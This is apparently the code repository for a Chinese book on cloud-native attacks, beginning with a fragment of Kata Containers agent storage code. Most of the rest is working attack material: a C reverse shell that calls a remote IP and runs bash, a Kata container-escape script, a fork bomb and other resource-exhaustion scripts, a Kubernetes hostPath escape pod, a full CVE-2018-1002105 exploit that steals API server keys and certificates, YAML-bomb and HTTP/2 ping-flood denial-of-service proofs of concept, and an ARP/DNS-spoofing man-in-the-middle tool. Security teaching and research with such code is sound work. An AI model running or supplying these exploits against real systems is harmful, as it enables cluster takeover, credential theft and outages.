ephemeralStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { s.Lock() defer s.Unlock() newStorage := s.setSandboxStorage(storage.MountPoint) if newStorage { var err error if err = os.MkdirAll(storage.MountPoint, os.ModePerm); err == nil { _, err = commonStorageHandler(storage) } return "", err } return "", nil } func localStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { s.Lock() defer s.Unlock() newStorage := s.setSandboxStorage(storage.MountPoint) if newStorage { // Extract and parse the mode out of the storage options. // Default to os.ModePerm. opts := parseOptions(storage.Options) mode := os.ModePerm if val, ok := opts["mode"]; ok { m, err := strconv.ParseUint(val, 8, 32) if err != nil { return "", err } mode = os.FileMode(m) } if err := os.MkdirAll(storage.MountPoint, mode); err != nil { return "", err } // We chmod the permissions for the mount point, as we can't rely on os.MkdirAll to set the // desired permissions. return "", os.Chmod(storage.MountPoint, mode) } return "", nil } // virtio9pStorageHandler handles the storage for 9p driver. func virtio9pStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { return commonStorageHandler(storage) } // virtioMmioBlkStorageHandler handles the storage for mmio blk driver. func virtioMmioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { //The source path is VmPath return commonStorageHandler(storage) } // virtioBlkCCWStorageHandler handles the storage for blk ccw driver. func virtioBlkCCWStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) { devPath, err := getBlkCCWDevPath(s, storage.Source) if err != nil { return "", err } if devPath == "" { return "", grpcStatus.Errorf(codes.InvalidArgument, "Storage source is empty") } storage.Source = devPath return commonStorageHandler(storage) } // virtioFSStorageHandler handles the storage for virtio-fs. func virtioFSStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { return commonStorageHandler(storage) } // virtioBlkStorageHandler handles the storage for blk driver. func virtioBlkStorageHandler(_ context.Context, storage pb.Storage, s *sandbox) (string, error) { // If hot-plugged, get the device node path based on the PCI address else // use the virt path provided in Storage Source if strings.HasPrefix(storage.Source, "/dev") { FileInfo, err := os.Stat(storage.Source) if err != nil { return "", err } // Make sure the virt path is valid if FileInfo.Mode()&os.ModeDevice == 0 { return "", fmt.Errorf("invalid device %s", storage.Source) } } else { devPath, err := getPCIDeviceName(s, storage.Source) if err != nil { return "", err } storage.Source = devPath } return commonStorageHandler(storage) } // virtioSCSIStorageHandler handles the storage for scsi driver. func virtioSCSIStorageHandler(ctx context.Context, storage pb.Storage, s *sandbox) (string, error) { // Retrieve the device path from SCSI address. devPath, err := getSCSIDevPath(s, storage.Source) if err != nil { return "", err } storage.Source = devPath return commonStorageHandler(storage) } func commonStorageHandler(storage pb.Storage) (string, error) { // Mount the storage device. if err := mountStorage(storage); err != nil { return "", err } return storage.MountPoint, nil } // mountStorage performs the mount described by the storage structure. func mountStorage(storage pb.Storage) error { flags, options := parseMountFlagsAndOptions(storage.Options) return mount(storage.Source, storage.MountPoint, storage.Fstype, flags, options) } // addStorages takes a list of storages passed by the caller, and perform the // associated operations such as waiting for the device to show up, and mount // it to a specific location, according to the type of handler chosen, and for // each storage. func addStorages(ctx context.Context, storages []*pb.Storage, s *sandbox) (mounts []string, err error) { span, ctx := trace(ctx, "mount", "addStorages") span.setTag("sandbox", s.id) defer span.finish() var mountList []string var storageList []string defer func() { if err != nil { s.Lock() for _, path := range storageList { if err := s.unsetAndRemoveSandboxStorage(path); err != nil { agentLog.WithFields(logrus.Fields{ "error": err, "path": path, }).Error("failed to roll back addStorages") } } s.Unlock() } }() for _, storage := range storages { if storage == nil { continue } devHandler, ok := storageHandlerList[storage.Driver] if !ok { return nil, grpcStatus.Errorf(codes.InvalidArgument, "Unknown storage driver %q", storage.Driver) } // Wrap the span around the handler call to avoid modifying // the handler interface but also to avoid having to add trace // code to each driver. handlerSpan, _ := trace(ctx, "mount", storage.Driver) mountPoint, err := devHandler(ctx, *storage, s) handlerSpan.finish() if _, ok := s.storages[storage.MountPoint]; ok { storageList = append([]string{storage.MountPoint}, storageList...) } if err != nil { return nil, err } if mountPoint != "" { // Prepend mount point to mount list. mountList = append([]string{mountPoint}, mountList...) } } return mountList, nil } // getMountFSType returns the FS type corresponding to the passed mount point and // any error ecountered. func getMountFSType(mountPoint string) (string, error) { if mountPoint == "" { return "", errors.Errorf("Invalid mount point '%s'", mountPoint) } mountstats, err := os.Open(procMountStats) if err != nil { return "", errors.Wrapf(err, "Failed to open file '%s'", procMountStats) } defer mountstats.Close() // Refer to fs/proc_namespace.c:show_vfsstat() for // the file format. re := regexp.MustCompile(fmt.Sprintf(`device .+ mounted on %s with fstype (.+)`, mountPoint)) scanner := bufio.NewScanner(mountstats) for scanner.Scan() { line := scanner.Text() matches := re.FindStringSubmatch(line) if len(matches) > 1 { return matches[1], nil } } if err := scanner.Err(); err != nil { return "", errors.Wrapf(err, "Failed to parse proc mount stats file %s", procMountStats) } return "", errors.Errorf("Failed to find FS type for mount point '%s'", mountPoint) } ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/evil_bin.c ================================================ /* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */ #include #include #include #include #include #define REMOTE_ADDR "172.16.56.1" #define REMOTE_PORT 10000 int main(int argc, char *argv[]) { struct sockaddr_in sa; int s; sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); sa.sin_port = htons(REMOTE_PORT); s = socket(AF_INET, SOCK_STREAM, 0); connect(s, (struct sockaddr *)&sa, sizeof(sa)); dup2(s, 0); dup2(s, 1); dup2(s, 2); execve("/bin/bash", 0, 0); return 0; } ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/exploit.sh ================================================ #!/bin/bash set -e # warm up echo "[*] Running an Ubuntu container to warm up..." docker run --rm ubuntu uname -a echo "[*] Exploiting to escape kata..." echo "[*] Running malicious container with kata on CLH..." docker run --rm --name stage1 kata-malware-image:latest echo "[+] Guest image file has been compromised" echo "[*] Running malicious container with kata on CLH once again..." docker run --rm -d --name stage2 kata-malware-image:latest echo "[+] Done. Now you can wait for the reverse shell :)" ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/get_kata_src.sh ================================================ #!/bin/bash mkdir -p $GOPATH/src/github.com/kata-containers/ cd $GOPATH/src/github.com/kata-containers/ git clone https://github.com/kata-containers/agent cd agent git checkout 1.10.0 ================================================ FILE: code/0304-运行时攻击/02-安全容器逃逸/install_kata.sh ================================================ #!/bin/bash set -e -x # 下载安装包(如果已经下载,此步可跳过) #wget https://github.com/kata-containers/runtime/releases/download/1.10.0/kata-static-1.10.0-x86_64.tar.xz tar xf kata-static-1.10.0-x86_64.tar.xz rm -rf /opt/kata mv ./opt/kata /opt rmdir ./opt rm -rf /etc/kata-containers cp -r /opt/kata/share/defaults/kata-containers /etc/ # 使用Cloud Hypervisor作为虚拟机管理程序 rm /etc/kata-containers/configuration.toml ln -s /etc/kata-containers/configuration-clh.toml /etc/kata-containers/configuration.toml # 配置Docker mkdir -p /etc/docker/ cat << EOF > /etc/docker/daemon.json { "runtimes": { "kata-runtime": { "path": "/opt/kata/bin/kata-runtime" }, "kata-clh": { "path": "/opt/kata/bin/kata-clh" }, "kata-qemu": { "path": "/opt/kata/bin/kata-qemu" } }, "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn/"] } EOF mkdir -p /etc/systemd/system/docker.service.d/ cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf [Service] ExecStart= ExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime EOF # 重载配置&重新启动Docker systemctl daemon-reload && systemctl restart docker ================================================ FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_cpu.sh ================================================ #!/bin/bash # for Debian & Ubuntu # apt install -y stress stress -c 1000 ================================================ FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_disk.sh ================================================ #!/bin/bash # for Debian & Ubuntu # apt install -y util-linux fallocate -l 9.4G ./bomb ================================================ FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_mem.sh ================================================ #!/bin/bash # for Debian & Ubuntu # apt install -y stress stress --vm-bytes 3300m --vm-keep -m 3 ================================================ FILE: code/0304-运行时攻击/03-资源耗尽型攻击/exhaust_pid.sh ================================================ #!/bin/bash :() { :|:& };: ================================================ FILE: code/0402-Kubernetes组件不安全配置/deploy_escape_pod_on_remote_host.sh ================================================ #!/bin/bash cat << EOF > escape.yaml # attacker.yaml apiVersion: v1 kind: Pod metadata: name: attacker spec: containers: - name: ubuntu image: ubuntu:latest imagePullPolicy: IfNotPresent # Just spin & wait forever command: [ "/bin/bash", "-c", "--" ] args: [ "while true; do sleep 30; done;" ] volumeMounts: - name: escape-host mountPath: /host-escape-door volumes: - name: escape-host hostPath: path: / EOF kubectl -s TARGET-IP:8080 apply -f escape.yaml sleep 8 kubectl -s TARGET-IP:8080 exec -it attacker /bin/bash ================================================ FILE: code/0403-CVE-2018-1002105/attacker.yaml ================================================ # attacker.yaml apiVersion: v1 kind: Pod metadata: name: attacker spec: containers: - name: ubuntu image: ubuntu:latest imagePullPolicy: IfNotPresent # Just spin & wait forever command: [ "/bin/bash", "-c", "--" ] args: [ "while true; do sleep 30; done;" ] volumeMounts: - name: escape-host mountPath: /host-escape-door volumes: - name: escape-host hostPath: path: / ================================================ FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_namespace.yaml ================================================ # cve_2018_1002105_namespace.yaml apiVersion: v1 kind: Namespace metadata: name: test ================================================ FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_pod.yaml ================================================ # cve_2018_1002105_pod.yaml apiVersion: v1 kind: Pod metadata: name: test namespace: test spec: containers: - name: ubuntu image: ubuntu:latest imagePullPolicy: IfNotPresent # Just spin & wait forever command: [ "/bin/bash", "-c", "--" ] args: [ "while true; do sleep 30; done;" ] serviceAccount: default serviceAccountName: default ================================================ FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_role.yaml ================================================ # cve_2018_1002105_role.yaml apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: name: test namespace: test rules: - apiGroups: - "" resources: - pods verbs: - get - list - delete - watch - apiGroups: - "" resources: - pods/exec verbs: - create - get ================================================ FILE: code/0403-CVE-2018-1002105/cve_2018_1002105_role_binding.yaml ================================================ # cve_2018_1002105_role_binding.yaml apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: test namespace: test roleRef: apiGroup: rbac.authorization.k8s.io kind: Role name: test subjects: - apiGroup: rbac.authorization.k8s.io kind: Group name: test ================================================ FILE: code/0403-CVE-2018-1002105/exploit.py ================================================ """ExP for CVE-2018-1002105 ONLY USED FOR SECURITY RESEARCH ILLEGAL USE IS **PROHIBITED** """ from secrets import base64, token_bytes import sys import argparse import socket import ssl from urllib import parse import json try: from http_parser.parser import HttpParser except ImportError: from http_parser.pyparser import HttpParser context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) # Args parser = argparse.ArgumentParser(description='ExP for CVE-2018-1002105.') required = parser.add_argument_group('required arguments') required.add_argument('--target', '-t', dest='host', type=str, help='API Server\'s IP', required=True) required.add_argument('--port', '-p', dest='port', type=str, help='API Server\'s port', required=True) required.add_argument('--bearer-token', '-b', dest='token', type=str, help='Bearer token for the low privileged user', required=True) required.add_argument('--namespace', '-n', dest='namespace', type=str, help='Namespace with method access', default='default', required=True) required.add_argument('--pod', '-P', dest='pod', type=str, required=True, help='Pod with method access') args = parser.parse_args() # HTTP Gadgets http_delimiter = '\r\n' host_header = f'Host: {args.host}:{args.port}' auth_header = f'Authorization: Bearer {args.token}' conn_header = 'Connection: upgrade' upgrade_header = 'Upgrade: websocket' agent_header = 'User-Agent: curl/7.64.1' accept_header = 'Accept: */*' origin_header = f'Origin: http://{args.host}:{args.port}' sec_key = base64.b64encode(token_bytes(20)).decode('utf-8') sec_websocket_key = f'Sec-WebSocket-Key: {sec_key}' sec_websocket_version = 'Sec-WebSocket-Version: 13' # secret targets ca_crt = 'ca.crt' client_crt = 'apiserver-kubelet-client.crt' client_key = 'apiserver-kubelet-client.key' def _get_http_body(byte_http): p = HttpParser() recved = len(byte_http) p.execute(byte_http, recved) return p.recv_body().decode('utf-8') def _recv_all_once(ssock, length=4096): res = b"" incoming = True while incoming: try: res += ssock.recv(length) except socket.timeout: if not res: continue else: break return res def _try_to_get_privilege(ssock, namespace, pod): payload1 = http_delimiter.join( (f'GET /api/v1/namespaces/{namespace}/pods/{pod}/exec HTTP/1.1', host_header, auth_header, upgrade_header, conn_header)) payload1 += http_delimiter * 2 ssock.send(payload1.encode('utf-8')) def _run_with_privilege(ssock, get_path): payload = http_delimiter.join( (f'GET {get_path} HTTP/1.1', host_header, auth_header, conn_header, upgrade_header, origin_header, sec_websocket_key, sec_websocket_version)) payload += http_delimiter * 2 ssock.send(payload.encode('utf-8')) def _match_or_exit(banner_bytes, resp, fail_message="[-] Failed."): if banner_bytes in resp: return print(fail_message) sys.exit(1) def _get_secret(resp): delimiter = b'-----' start = resp.index(delimiter) end = resp.rindex(delimiter) return resp[start:end + len(delimiter)].decode('utf-8') def _save_file(file_name, content): with open(file_name, 'w') as f: f.write(content) def _steal_secret(api_server, secret_file, match_banner): with socket.create_connection((args.host, int(args.port))) as sock: with context.wrap_socket(sock, server_hostname=args.host) as ssock: ssock.settimeout(1) print('[*] Creating new privileged pipe...') _try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod) resp = _recv_all_once(ssock) _match_or_exit(b'stdin, stdout, stderr', resp) print(f"[*] Trying to steal {secret_file}...") cmd1 = parse.quote('/bin/cat') cmd2 = parse.quote(f"/etc/kubernetes/pki/{secret_file}") _run_with_privilege( ssock, f'/exec/kube-system/{api_server}/kube-apiserver?command={cmd1}&command={cmd2}&input=1&output=1&tty=0') resp = _recv_all_once(ssock) _match_or_exit(b'HTTP/1.1 101 Switching Protocols', resp) _match_or_exit(match_banner, resp, fail_message=f'[-] Cannot find banner {match_banner}.') print(f'[+] Got {secret_file}.') secret_content = _get_secret(resp) _save_file(secret_file, secret_content) print(f'[+] Secret {secret_file} saved :)') def main(): print("[*] Exploiting CVE-2018-1002105...") with socket.create_connection((args.host, int(args.port))) as sock: with context.wrap_socket(sock, server_hostname=args.host) as ssock: # step 1 ssock.settimeout(1) print("[*] Checking vulnerable or not...") _try_to_get_privilege(ssock, namespace=args.namespace, pod=args.pod) resp = _recv_all_once(ssock) _match_or_exit( b'stdin, stdout, stderr', resp, fail_message='[-] Not vulnerable to CVE-2018-1002105.') print("[+] Vulnerable to CVE-2018-1002105, continue.") # step 2 print("[*] Getting running pods list...") _run_with_privilege(ssock, '/runningpods/') resp = _recv_all_once(ssock) _match_or_exit(b'HTTP/1.1 200 OK', resp) print("[+] Got running pods list.") pods_info = json.loads(_get_http_body(resp)) pods_list = [pod['metadata']['name'] for pod in pods_info['items']] for pod in pods_list: if pod.startswith('kube-apiserver'): api_server = pod break else: print("[-] Cannot find API Server.") sys.exit(1) print(f"[*] API Server is {api_server}.") # step 3 _steal_secret( api_server=api_server, secret_file=ca_crt, match_banner=b'BEGIN CERTIFICATE') _steal_secret( api_server=api_server, secret_file=client_crt, match_banner=b'BEGIN CERTIFICATE') _steal_secret( api_server=api_server, secret_file=client_key, match_banner=b'BEGIN RSA PRIVATE KEY') print('[+] Enjoy your trip :)') cmd_try = f"kubectl --server=https://{args.host}:{args.port}" \ f" --certificate-authority={ca_crt}" \ f" --client-certificate={client_crt}" \ f" --client-key={client_key} get pods -n kube-system" print(cmd_try) if __name__ == "__main__": main() ================================================ FILE: code/0403-CVE-2018-1002105/test-token.csv ================================================ password,test,test,test ================================================ FILE: code/0404-K8s拒绝服务攻击/CVE-2019-11253-poc.sh ================================================ #!/bin/bash # 查看Kubernetes版本 kubectl version | grep Server # 开启通向API Server的代理 kubectl proxy & # 创建一个恶意ConfigMap文件(n=9) cat << EOF > cve-2019-11253.yaml apiVersion: v1 data: a: &a ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default EOF # 向API Server发出ConfigMap创建请求 curl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H "Content-Type: application/yaml" --data-binary @cve-2019-11253.yaml ================================================ FILE: code/0404-K8s拒绝服务攻击/CVE-2019-9512-poc.py ================================================ #!/usr/bin/python # cve-2019-9512.py import ssl import socket import time import sys class PingFlood: # HTTP/2 Magic头 PREAMBLE = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n' # PING帧 PING_FRAME = b"\x00\x00\x08" \ b"\x06" \ b"\x00" \ b"\x00\x00\x00\x00" \ b"\x00\x01\x02\x03\x04\x05\x06\x07" # WINDOW UPDATE帧 WINDOW_UPDATE_FRAME = b"\x00\x00\x04\x08\x00\x00\x00\x00\x00\x3f\xff\x00\x01" # SETTINGS帧 SETTINGS_FRAME = b"\x00\x00\x12\x04\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x64\x00" \ b"\x04\x40\x00\x00\x00\x00\x02\x00\x00\x00\x00" # SETTINGS响应帧 SETTINGS_ACK_FRAME = b"\x00\x00\x00\x04\x01\x00\x00\x00\x00" # HEADERS帧,请求/healthz HEADERS_FRAME_healthz = b"\x00\x00\x29\x01\x05\x00\x00\x00\x01\x82\x04\x86\x62\x72\x8e\x84" \ b"\xcf\xef\x87\x41\x8e\x0b\xe2\x5c\x2e\x3c\xb8\x5f\x5c\x4d\x8a\xe3" \ b"\x8d\x34\xcf\x7a\x88\x25\xb6\x50\xc3\xab\xb8\xd2\xe1\x53\x03\x2a" \ b"\x2f\x2a" def __init__(self, ip, port=6443, socket_count=1000): # 配置到Kubernetes API Server的TLS上下文 self._context = ssl.SSLContext(ssl.PROTOCOL_TLS) self._context.check_hostname = False self._context.load_cert_chain(certfile="./client_cert", keyfile="./client_key_data") self._context.load_verify_locations("./certificate_authority_data") self._context.verify_mode = ssl.CERT_REQUIRED # self._context.keylog_filename = "/Users/rambo/Desktop/exp/keylog" # 协议协商 self._context.set_alpn_protocols(['h2', 'http/1.1']) self._ip = ip self._port = port # 创建n个socket self._sockets = [self.create_socket() for _ in range(socket_count)] def create_socket(self): try: print("[*] Creating socket...") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(4) # 应用配置的TLS上下文 ssock = self._context.wrap_socket(sock, server_side=False) ssock.connect((self._ip, self._port)) # 首先发起正常的对/healthz接口的查询请求 ssock.send(self.PREAMBLE) ssock.send(self.SETTINGS_FRAME) ssock.send(self.HEADERS_FRAME_healthz) ssock.send(self.SETTINGS_ACK_FRAME) # 接收响应和回复 rmsg = ssock.recv(1024) rmsg = ssock.recv(1024) rmsg = ssock.recv(1024) rmsg = ssock.recv(1024) rmsg = ssock.recv(4096) # 返回一个待用于攻击的socket return ssock except socket.error as se: print("[-] Error: " + str(se)) # 创建socket失败,则等待一会儿再次尝试创建 time.sleep(0.5) return self.create_socket() def attack(self): print("[*] Flooding...") for s in self._sockets: try: # 发送PING帧,不读取响应帧 s.send(self.PING_FRAME) except socket.error: self._sockets.remove(s) self._sockets.append(self.create_socket()) if __name__ == "__main__": dos = PingFlood(sys.argv[1], int(sys.argv[2]), int(sys.argv[3])) dos.attack() ================================================ FILE: code/0405-云原生网络攻击/Dockerfile ================================================ FROM ubuntu:latest COPY k8s_dns_mitm.py /poc.py RUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list RUN apt update && DEBIAN_FRONTEND=noninteractive apt install -y python3 python3-pip && apt clean RUN pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn RUN chmod u+x /poc.py ENTRYPOINT ["/bin/bash", "-c", "/poc.py example.com "] ================================================ FILE: code/0405-云原生网络攻击/attacker.yaml ================================================ # attacker_pod apiVersion: v1 kind: Pod metadata: name: attacker spec: containers: - name: main image: k8s_dns_mitm:1.0 imagePullPolicy: IfNotPresent ================================================ FILE: code/0405-云原生网络攻击/build_image.sh ================================================ #!/bin/bash docker build -t k8s_dns_mitm:1.0 . ================================================ FILE: code/0405-云原生网络攻击/cleanup.sh ================================================ #!/bin/bash set -e -x kubectl delete pod victim attacker for record in $(arp | grep cni0 | awk '{print $1}'); do arp -d "$record" done ================================================ FILE: code/0405-云原生网络攻击/exploit.sh ================================================ #!/bin/bash set -e echo "[*] Pulling curl image..." docker pull curlimages/curl:latest echo "[*] Creating attacker and victim pods..." kubectl apply -f attacker.yaml kubectl apply -f victim.yaml echo "[*] Waiting 20s for pods' creation..." sleep 20 echo "[*] Reading attacker's log..." kubectl logs attacker echo "[*] Trying to curl http://example.com in victim..." kubectl exec -it victim curl http://example.com ================================================ FILE: code/0405-云原生网络攻击/k8s_dns_mitm.py ================================================ #!/usr/bin/python3 # issues about scapy with Pycharm: # https://stackoverflow.com/questions/45691654/unresolved-reference-with-scapy import sys import time from http.server import HTTPServer, BaseHTTPRequestHandler from multiprocessing import Process from scapy.layers.inet import IP, UDP, Ether, ICMP from scapy.layers.l2 import ARP from scapy.sendrecv import srp1, srp, send, sendp, sniff, sr1 from scapy.layers.dns import DNS, DNSQR, DNSRR class S(BaseHTTPRequestHandler): def _set_response(self): self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() def do_GET(self): self._set_response() self.wfile.write("F4ke Website\n".encode('utf-8')) class DnsProxy: """ Handles DNS request packets, will forward them to real kube-dns, except for targeted domains. """ def __init__(self, upstream_server, local_server_mac, local_server_ip, self_mac, self_ip, fake_domain, interface): self.upstream_server = upstream_server self.local_server_mac = local_server_mac self.local_server_ip = local_server_ip self.mac = self_mac self.ip = self_ip self.fake_domain = fake_domain self.interface = interface @staticmethod def generate_response(request, ip=None, nx=None): return DNS(id=request[DNS].id, aa=1, # authoritative qr=1, # a response rd=request[DNS].rd, # copy recursion qdcount=request[DNS].qdcount, # copy question count qd=request[DNS].qd, # copy question itself ancount=1 if not nx else 0, # we provide a single answer an=DNSRR( rrname=request[DNS].qd.qname, type='A', ttl=1, rdata=ip) if not nx else None, rcode=0 if not nx else 3 ) @staticmethod def is_local_domain(domain): for tld in (".local.", ".internal."): if domain.decode('ascii').endswith(tld): return True def forward(self, req_pkt, verbose): # first contacting local dns server req_domain = req_pkt[DNSQR].qname def parse_responses(p): return ', '.join( [str(p[DNSRR][x].rdata) for x in range(p[DNS].ancount)]) # if local, get response from kube-dns if self.is_local_domain(req_domain): answer = sr1(IP(dst=self.local_server_ip) / UDP() / DNS(rd=0, id=req_pkt[DNS].id, qd=DNSQR(qname=req_domain)), verbose=verbose, timeout=1) resp_pkt = Ether( src=self.local_server_mac) / IP( dst=req_pkt[IP].src, src=self.local_server_ip) / UDP( sport=53, dport=req_pkt[UDP].sport) / DNS() # if timeout, returning NXDOMAIN if answer: resp_pkt[DNS] = answer[DNS] else: resp_pkt[DNS] = self.generate_response(req_pkt, nx=True) sendp(resp_pkt, verbose=verbose) print("[+] {} <- KUBE-DNS response {} - {}".format(resp_pkt[IP].dst, str(req_domain), parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0 else resp_pkt[DNS].rcode)) # else, get with upstream else: answer = sr1(IP(dst=self.upstream_server) / UDP() / DNS(rd=1, qd=DNSQR(qname=req_domain)), verbose=verbose) resp_pkt = Ether( src=self.local_server_mac) / IP( dst=req_pkt[IP].src, src=self.local_server_ip) / UDP( sport=53, dport=req_pkt[UDP].sport) / DNS() resp_pkt[DNS] = answer[DNS] resp_pkt[DNS].id = req_pkt[DNS].id sendp(resp_pkt, verbose=verbose) print("[+] {} <- UPSTREAM response {} - {}".format(resp_pkt[IP].dst, str(req_domain), parse_responses(resp_pkt) if resp_pkt[DNS].rcode == 0 else resp_pkt[DNS].rcode)) def spoof(self, req_pkt): spf_resp = IP(dst=req_pkt[IP].src, src=self.local_server_ip) / UDP(dport=req_pkt[UDP].sport, sport=53) / self.generate_response(req_pkt, ip=self.ip) send(spf_resp, verbose=0, iface=self.interface) print("[+] Spoofed response to: {} | {} is at {}".format(spf_resp[IP].dst, str(req_pkt["DNS Question Record"].qname), self.ip)) def handle_queries(self, req_pkt): """ decides whether to spoof or forward the packet """ if req_pkt["DNS Question Record"].qname.startswith(self.fake_domain.encode( 'utf-8')): self.spoof(req_pkt) else: self.forward(req_pkt, verbose=False) def dns_req_filter(self, pkt): return (UDP in pkt and DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0 and pkt[UDP].dport == 53 and pkt[Ether].dst == self.mac and pkt[IP].dst == self.local_server_ip) def start(self): # sniffing and filtering dns queries sent to self sniff( lfilter=self.dns_req_filter, prn=self.handle_queries, iface=self.interface, store=False) def get_self_mac_ip(): return Ether().src, ARP().psrc def get_kube_dns_svc_ip(): with open('/etc/resolv.conf', 'r') as f: return f.readline().strip().split(' ')[1] def get_coredns_pod_mac_ip(kube_dns_svc_ip, self_ip, verbose): mac = srp1(Ether() / IP(dst=kube_dns_svc_ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR()), verbose=verbose).src answers, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="{}/24".format(self_ip)), timeout=4, verbose=verbose) for answer in answers: if answer[1].src == mac: return mac, answer[1][ARP].psrc return None, None def get_bridge_mac_ip(verbose): res = srp1(Ether() / IP(dst="8.8.8.8", ttl=1) / ICMP(), verbose=verbose) return res[Ether].src, res[IP].src def arp_spoofing(bridge_ip, coredns_pod_ip, bridge_mac, verbose): while True: send(ARP(op=2, pdst=bridge_ip, psrc=coredns_pod_ip, hwdst=bridge_mac), verbose=verbose) def fake_http_server(): server_address = ('', 80) server = HTTPServer(server_address, S) server.serve_forever() def main(verbose): print("Kubernetes MITM Attack PoC") print("[*] Starting HTTP Server at 80...") p1 = Process(target=fake_http_server) p1.start() self_mac, self_ip = get_self_mac_ip() print("[+] Current pod IP: %s, MAC: %s" % (self_ip, self_mac)) kube_dns_svc_ip = get_kube_dns_svc_ip() print("[+] Kubernetes DNS service IP: %s" % kube_dns_svc_ip) coredns_pod_mac, coredns_pod_ip = get_coredns_pod_mac_ip( kube_dns_svc_ip, self_ip, verbose=verbose) print("[+] CoreDNS pod IP: %s, MAC: %s" % (coredns_pod_ip, coredns_pod_mac)) bridge_mac, bridge_ip = get_bridge_mac_ip(verbose=verbose) print("[+] CNI bridge IP: %s, MAC: %s" % (bridge_ip, bridge_mac)) print("[*] Starting ARP spoofing...") p2 = Process( target=arp_spoofing, args=( bridge_ip, coredns_pod_ip, bridge_mac, verbose)) p2.start() print("[*] Starting DNS proxy...") # proxy dns query and response dns_proxy = DnsProxy( upstream_server="8.8.8.8", local_server_mac=coredns_pod_mac, local_server_ip=coredns_pod_ip, self_mac=self_mac, self_ip=self_ip, fake_domain=sys.argv[1], interface='eth0') p3 = Process(target=dns_proxy.start) p3.start() while True: time.sleep(1) def usage(): print( "Usage:\n\tpython3 {} target_domain".format( sys.argv[0])) if __name__ == "__main__": if len(sys.argv) != 2: usage() else: main(verbose=False) ================================================ FILE: code/0405-云原生网络攻击/victim.yaml ================================================ # victim pod apiVersion: v1 kind: Pod metadata: name: victim spec: containers: - name: main image: curlimages/curl:latest imagePullPolicy: IfNotPresent # Just spin & wait forever command: [ "/bin/sh", "-c", "--" ] args: [ "while true; do sleep 30; done;" ]